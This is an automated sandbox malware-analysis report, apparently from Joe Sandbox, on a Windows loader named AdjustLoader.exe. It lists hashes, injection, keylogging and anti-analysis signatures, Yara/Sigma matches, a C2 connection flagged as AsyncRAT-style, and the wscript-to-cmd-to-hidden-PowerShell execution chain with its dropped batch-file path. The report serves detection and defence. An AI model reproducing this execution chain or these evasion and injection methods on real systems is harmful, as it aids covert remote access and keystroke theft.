Windows Analysis Report
AdjustLoader.exe

Overview

General Information

Sample name: AdjustLoader.exe
Analysis ID: 1502262
MD5: 256f033589595c9d3b595bc844282381
SHA1: a44eac7e3b61186905bdcbe20af5cf949a287f01
SHA256: 65a64d52cf39dc7f6c1089971c8813ce02bfc601137dcf0b776b7302d52bde65
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: AdjustLoader.exe Virustotal: Detection: 20% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: AdjustLoader.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 51_2_00401000
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: AdjustLoader.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr
Source: Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr
Source: Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D834 FindFirstFileExW, 47_2_0000024D9FF7D834
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D9B8 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_0000024D9FF7D9B8

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 83.143.112.51:6000 -> 192.168.2.4:49747
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49747 -> 83.143.112.51:6000
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INTERNETIA_ETTH2-ASNoc-BialystokPL INTERNETIA_ETTH2-ASNoc-BialystokPL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipwho.is
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown TCP traffic detected without corresponding DNS query: 83.143.112.51
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.11.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000012.00000002.2242069993.00000138702D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000002F.00000002.2587997182.0000024D9FD4C000.00000004.00000020.00020000.00000000.sdmp, Null.39.dr, Null.8.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002E.00000002.2407283977.0000000004AC9000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004ADC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBqq
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGa
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2020721365.0000013801152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D62A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5796, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: unknown Process created: Commandline size = 5450
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
